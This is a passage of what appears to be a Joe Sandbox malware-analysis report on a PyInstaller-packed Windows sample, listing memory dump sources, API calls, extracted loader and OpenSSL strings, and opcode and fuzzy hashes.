                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 935138226047A186D6349F36E4181BBF7A1F7A8B61F044125EFCE83699EF7CD085CB20
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                    • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                    • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                    • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                    • Instruction ID: 00597c50c38c2ccc21b2ebea879ae522ea4e1956abc57469e141b1a2ae1aa794
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C21DD21B0AA4281E7476B7DA858176E250FF6AB90F984134DB1DC73EDFE6CD584C324
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2448990282.00007FFD93BF1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FFD93BF0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2448927188.00007FFD93BF0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2448990282.00007FFD93C52000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2448990282.00007FFD93C9E000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2448990282.00007FFD93CA2000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2448990282.00007FFD93CFB000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2448990282.00007FFD93D01000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2448990282.00007FFD93D04000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450214722.00007FFD93D05000.00000080.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450302164.00007FFD93D07000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93bf0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 349153199-0
                                                                                                                                                                                                                                    • Opcode ID: d9075fb2b0ba11a0ca4eca901d47b6c9aa6f7dca5772fbcecca27907c885e73c
                                                                                                                                                                                                                                    • Instruction ID: 7f6d33b5923e7d967c8875fd98c844651fcdfe0f500e238304994eb92b8db478
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9075fb2b0ba11a0ca4eca901d47b6c9aa6f7dca5772fbcecca27907c885e73c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9781C328F0C64346FA74BBE5D4712BD6698AF85788F94A135D9CC7B3A6DE3CE8458300
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID: -$:$f$p$p
                                                                                                                                                                                                                                    • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                    • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                    • Instruction ID: af3f2916eab9aafb0fe3373c4df90f5f9c00b436f1e23828c0880fae189e5125
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0129461E0A24386FB667E1CD1442BBB661EB6A750FC44139D789465ECFFBCE580CB20
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID: f$f$p$p$f
                                                                                                                                                                                                                                    • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                    • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                    • Instruction ID: 22e67fd42674f0cccf0046000ddafa029f34ea604b410958f3ab441c39dc7805
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6126161E2E14385FB257E1C905467BA6A1FB62750FD88035D79A469ECEFBCE480CB30
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2050909247-3659356012
• Opcode ID: 5e66ead2c911d9123970d0edd9d032ddcdfaabb90027aae346dac254b99e7862
• Instruction ID: 445a8fa38f2869c8095a6fc2133a46372657e1fb45ad5f4d2ee38170357cd616
• Opcode Fuzzy Hash: 5e66ead2c911d9123970d0edd9d032ddcdfaabb90027aae346dac254b99e7862
• Instruction Fuzzy Hash: A0417321A1A55281EA17FB1998046BBF3A0BF66B84FC44431EF0C8779DEEBCE541C754
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
Similarity
• API ID: ErrorLastsetsockopt
• String ID: ..\s\crypto\bio\b_sock2.c$o
• API String ID: 1729277954-1872632005
• Opcode ID: 34993e59505dbed600dca64135d27a9ba0d4750b564e5c6ba914b5e12530ade6
• Instruction ID: 613ad9b1f10f00fa0c781a19894f3c6116e1b8a4791b29dae2bfe9cc2a178d0c
• Opcode Fuzzy Hash: 34993e59505dbed600dca64135d27a9ba0d4750b564e5c6ba914b5e12530ade6
• Instruction Fuzzy Hash: BD519F71B0854286F7309FE2E8246BA7368FB82788F448235EA5C17A96CF3DE555CB41
APIs
• GetTempPathW.KERNEL32(?,?,00000000,00007FF7B2B63CBB), ref: 00007FF7B2B68704
• GetCurrentProcessId.KERNEL32(?,00000000,00007FF7B2B63CBB), ref: 00007FF7B2B6870A
• CreateDirectoryW.KERNEL32(?,00000000,00007FF7B2B63CBB), ref: 00007FF7B2B6874C
  • Part of subcall function 00007FF7B2B68830: GetEnvironmentVariableW.KERNEL32(00007FF7B2B6388E), ref: 00007FF7B2B68867
  • Part of subcall function 00007FF7B2B68830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7B2B68889
  • Part of subcall function 00007FF7B2B78238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B2B78251
  • Part of subcall function 00007FF7B2B62810: MessageBoxW.USER32 ref: 00007FF7B2B628EA
Strings
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
• String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
• API String ID: 3563477958-1339014028
• Opcode ID: 66c90a5d53ac47f43424169854e846cd906a20bcd121c62903de4a8bc628b946
• Instruction ID: 093af77840f8d4d39685e86d7ea05eef8b0997deeb2c615fd80b986a5536432a
• Opcode Fuzzy Hash: 66c90a5d53ac47f43424169854e846cd906a20bcd121c62903de4a8bc628b946
• Instruction Fuzzy Hash: 4F419211A1B64280F917B72D98552BBD261AF66780FC04532DF0D8B7AEFEBCE505C224
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: HandleModule$AddressProc
                                                                                                                                                                                                                                    • String ID: OPENSSL_Applink$OPENSSL_Uplink(%p,%02X): $_ssl.pyd$_ssl_d.pyd
                                                                                                                                                                                                                                    • API String ID: 1883125708-1130596517
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
Similarity
• API ID: InformationObjectUser$AddressErrorHandleLastModuleProcProcessStationWindow
• String ID: Service-0x$_OPENSSL_isservice
• API String ID: 1944374717-1672312481
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
APIs
• FreeLibrary.KERNEL32(?,?,?,00007FF7B2B7F0AA,?,?,-00000018,00007FF7B2B7AD53,?,?,?,00007FF7B2B7AC4A,?,?,?,00007FF7B2B75F3E), ref: 00007FF7B2B7EE8C
• GetProcAddress.KERNEL32(?,?,?,00007FF7B2B7F0AA,?,?,-00000018,00007FF7B2B7AD53,?,?,?,00007FF7B2B7AC4A,?,?,?,00007FF7B2B75F3E), ref: 00007FF7B2B7EE98
Strings
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• API String ID: 3013587201-537541572
APIs
• GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B2B63706,?,00007FF7B2B63804), ref: 00007FF7B2B62C9E
• FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B2B63706,?,00007FF7B2B63804), ref: 00007FF7B2B62D63
• MessageBoxW.USER32 ref: 00007FF7B2B62D99
Strings
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: Message$CurrentFormatProcess
• String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
• API String ID: 3940978338-251083826
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Fiber$Switch$CreateDelete
                                                                                                                                                                                                                                    • String ID: *$..\s\crypto\async\async.c
                                                                                                                                                                                                                                    • API String ID: 2050058302-1471988776
                                                                                                                                                                                                                                    • Opcode ID: 1831d7c809a8188426ac0f01b2ae61a537539a6563a9100cc60af150d2942dba
                                                                                                                                                                                                                                    • Instruction ID: c5a5ba66f60370f8762f9a07f4207a216c4279b15d0701401d5bf59cb80617a5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1831d7c809a8188426ac0f01b2ae61a537539a6563a9100cc60af150d2942dba
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3BA15572B09A4292EB34DFE6E4B026973A8EF44B84F049131CA8D57BA5EF3DE555C700
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: EnvironmentVariable
                                                                                                                                                                                                                                    • String ID: OPENSSL_ia32cap$~$~$~$~
                                                                                                                                                                                                                                    • API String ID: 1431749950-1981414212
                                                                                                                                                                                                                                    • Opcode ID: f54770ac84b8c5300f15358e4cffcff24408fff1c96f1f72ed2546603f76ac2f
                                                                                                                                                                                                                                    • Instruction ID: d5ecfc081238a94a153d1f415efb610fbeb6a25bd8735b8bfab0527daf232a54
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f54770ac84b8c5300f15358e4cffcff24408fff1c96f1f72ed2546603f76ac2f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EA418124F0C6578AEB34DBC5A4B01B936A4EB45780F848235E95E677A9EF3DE481E700
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF7B2B6DF7A,?,?,?,00007FF7B2B6DC6C,?,?,?,00007FF7B2B6D869), ref: 00007FF7B2B6DD4D
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF7B2B6DF7A,?,?,?,00007FF7B2B6DC6C,?,?,?,00007FF7B2B6D869), ref: 00007FF7B2B6DD5B
                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF7B2B6DF7A,?,?,?,00007FF7B2B6DC6C,?,?,?,00007FF7B2B6D869), ref: 00007FF7B2B6DD85
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF7B2B6DF7A,?,?,?,00007FF7B2B6DC6C,?,?,?,00007FF7B2B6D869), ref: 00007FF7B2B6DDF3
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF7B2B6DF7A,?,?,?,00007FF7B2B6DC6C,?,?,?,00007FF7B2B6D869), ref: 00007FF7B2B6DDFF
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                    • String ID: api-ms-
                                                                                                                                                                                                                                    • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                    • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                    • Instruction ID: 54afd11ce53b674d5d73d884eed212910d6a18f819cd1efb76245513016dc380
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6331D321B1B60281EE13BB1A9400676E394FF27BA4F990535DF1D8A398FEBCE040D324
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: 00007B2245630
                                                                                                                                                                                                                                    • String ID: MASK:$default$nombstr$pkix$utf8only
                                                                                                                                                                                                                                    • API String ID: 1780217008-3483942737
                                                                                                                                                                                                                                    • Opcode ID: a21ae9ee1a6a80a1cd62bd08bae20b9b71c674710c0f9c2fb243c96c79f53681
                                                                                                                                                                                                                                    • Instruction ID: 495fc6f192fef1c3d81da09ee30b2328d5876a3815f7443ecaf9538c1b74b8df
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a21ae9ee1a6a80a1cd62bd08bae20b9b71c674710c0f9c2fb243c96c79f53681
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C310962B1C5C582EB714BE9E4B07B837A5EB46B60F446232EB5E43692DF3CE494C700
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7B2B6351A,?,00000000,00007FF7B2B63F23), ref: 00007FF7B2B62AA0
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
